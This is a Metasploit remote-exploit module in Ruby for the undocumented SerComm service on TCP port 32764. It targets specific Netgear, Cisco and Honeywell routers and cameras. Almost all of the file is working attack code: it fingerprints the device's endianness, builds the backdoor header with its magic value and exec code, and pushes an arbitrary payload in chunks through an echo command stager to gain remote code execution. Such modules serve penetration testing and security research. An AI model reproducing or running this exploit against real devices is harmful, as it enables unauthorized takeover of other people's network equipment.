##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
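class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Reply prefixes the service answers with. Which one comes back is used to
  # tell big- and little-endian devices apart (see #endian_for); the mapping
  # below is the one the original author observed, it is not derived from the
  # pack byte order.
  BANNER_BE = "MMcS"
  BANNER_LE = "ScMM"

  # Fields of the request header: the service's magic value (ASCII "ScMM")
  # and its "exec" command code. These fixed header bytes are also what a
  # network signature for this service would match on.
  BACKDOOR_MAGIC = 0x53634d4d
  CMD_EXEC       = 0x07

  def initialize(info={})
    super(update_info(info,
      'Name'           => "SerComm Device Remote Code Execution",
      'Description'    => %q{
        This module will cause remote code execution on several SerComm devices.
        These devices typically include routers from NetGear and Linksys.
        This module was tested successfully against several NetGear, Honeywell
        and Cisco devices.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
        ],
      'Payload'        =>
        {
          'Space'       => 10000, # Could be more, but this should be good enough
          'DisableNops' => true
        },
      'Platform'       => 'linux',
      'Privileged'     => false,
      # Per-target keys: 'PackFormat' selects the header byte order ('VVV' =
      # three 32-bit little-endian words, 'NNN' = big-endian), 'NoArgs',
      # 'UploadPath' and 'PayloadEncode' are passed through to the command
      # stager. The "Manual" targets read the same values from the advanced
      # options registered below instead.
      'Targets'        =>
        [
          ['Generic Linux MIPS Big Endian',
            {
              'Arch'       => ARCH_MIPSBE,
              'PackFormat' => 'VVV'
            }
          ],
          ['Generic Linux MIPS Little Endian',
            {
              'Arch'       => ARCH_MIPSLE,
              'PackFormat' => 'NNN'
            }
          ],
          ['Manual Linux MIPS Big Endian',
            {
              'Arch' => ARCH_MIPSBE
            }
          ],
          ['Manual Linux MIPS Little Endian',
            {
              'Arch' => ARCH_MIPSLE
            }
          ],
          ['Cisco WAP4410N',
            {
              'Arch'       => ARCH_MIPSBE,
              'PackFormat' => 'NNN',
            }
          ],
          ['Honeywell WAP-PL2 IP Camera',
            {
              'Arch'       => ARCH_MIPSLE,
              'PackFormat' => 'VVV'
            }
          ],
          ['Netgear DG834',
            {
              'Arch'       => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs'     => true
            }
          ],
          ['Netgear DG834G',
            {
              'Arch'          => ARCH_MIPSLE,
              'PackFormat'    => 'VVV',
              'PayloadEncode' => 'octal'
            }
          ],
          ['Netgear DG834PN',
            {
              'Arch'       => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs'     => true
            }
          ],
          ['Netgear DGN1000',
            {
              'Arch'       => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs'     => true
            }
          ],
          ['Netgear DSG835',
            {
              'Arch'       => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs'     => true,
            }
          ],
          ['Netgear WPNT834',
            {
              'Arch'          => ARCH_MIPSBE,
              'PackFormat'    => 'NNN',
              'UploadPath'    => '/var',
              'PayloadEncode' => 'octal'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'References'     =>
        [
          [ 'OSVDB', '101653' ],
          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
        ],
      'DisclosureDate' => "Dec 31 2013" ))

    register_options(
      [
        Opt::RPORT(32764)
      ])

    # Wire parameters for the "Manual" targets; named targets carry the same
    # values in their target hash and ignore these options (see #exploit).
    register_advanced_options(
      [
        OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
        OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
        OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
        OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
      ])

    # The stager flavor is fixed to :echo in #exploit and the encoding is
    # chosen per target, so the generic CmdStager options are hidden.
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Probes the service and classifies the host by its reply prefix.
  #
  # A connection failure is reported as Unknown rather than Safe: an
  # unreachable or filtered port says nothing about whether the service is
  # present, and reporting Safe there produces a false negative in scans.
  #
  # @return [Msf::Exploit::CheckCode] Appears when a known reply prefix is
  #   seen, Safe for any other (or empty) reply, Unknown when the TCP
  #   connection could not be made
  def check
    case endian_for(read_banner)
    when 'BE'
      vprint_status("Detected Big Endian")
      Msf::Exploit::CheckCode::Appears
    when 'LE'
      vprint_status("Detected Little Endian")
      Msf::Exploit::CheckCode::Appears
    else
      Msf::Exploit::CheckCode::Safe
    end
  rescue Rex::ConnectionError => e
    print_error("Connection failed: #{e.class}: #{e}")
    Msf::Exploit::CheckCode::Unknown
  end

  # Selects the wire parameters for the chosen target and hands the payload
  # to the echo-flavored command stager, which calls #execute_command once
  # per chunk.
  def exploit
    if target.name =~ /Manual/
      # The option is registered as PACKFORMAT; the message names it exactly
      # so users can find it.
      print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACKFORMAT advanced options")
      @no_args         = datastore['NOARGS']
      @upload_path     = datastore['UPLOADPATH']
      @encoding_format = datastore['ENCODING']
      @pack_format     = datastore['PACKFORMAT']
    else
      @no_args         = target['NoArgs']
      @upload_path     = target['UploadPath']
      @encoding_format = target['PayloadEncode']
      @pack_format     = target['PackFormat']
    end

    execute_cmdstager(
      :noargs     => @no_args,
      :temp       => @upload_path,
      :enc_format => @encoding_format,
      :flavor     => :echo
    )
  end

  # Connects, reads the service's reply and maps it to an endianness label.
  #
  # @return [String, nil] 'BE', 'LE', or nil when the reply is not recognised
  #   or the connection fails (the failure is printed, not raised)
  def endian_fingerprint
    endian_for(read_banner)
  rescue Rex::ConnectionError => e
    print_error("Connection failed: #{e.class}: #{e}")
    nil
  end

  # Sends a few random bytes to the service and returns whatever it answers.
  # The socket is always released, including when put/get raise.
  #
  # @return [String, nil] raw reply, or nil when nothing was read
  # @raise [Rex::ConnectionError] when the TCP connection cannot be made
  def read_banner
    connect
    sock.put(rand_text(5))
    sock.get_once
  ensure
    disconnect
  end

  # Maps a reply to the endianness label used by the target definitions.
  #
  # @param res [String, nil] raw reply from #read_banner
  # @return [String, nil] 'BE', 'LE', or nil for an empty/unrecognised reply
  def endian_for(res)
    return nil unless res
    return 'BE' if res.start_with?(BANNER_BE)
    return 'LE' if res.start_with?(BANNER_LE)
    nil
  end

  # CmdStager callback: sends one command to the service.
  #
  # The request is a three-field header packed with the target's PackFormat
  # and followed by the command text. The length field counts bytes, not
  # characters, so it always matches the number of bytes written after the
  # header (String#length would under-count multi-byte characters).
  #
  # @param cmd  [String] command line produced by the stager
  # @param opts [Hash]   stager options (not used by this module)
  def execute_command(cmd, opts)
    # BACKDOOR_MAGIC => Backdoor code
    # CMD_EXEC       => Exec command
    # cmd.bytesize   => Length of command to execute, sent after communication struct
    data = [BACKDOOR_MAGIC, CMD_EXEC, cmd.bytesize].pack(@pack_format)

    connect
    begin
      # Send command structure followed by command text
      sock.put(data + cmd)
    ensure
      disconnect
    end

    # Pause between commands, as the original module did; presumably to give
    # the device time to run one before the next arrives.
    Rex.sleep(1)
  end
end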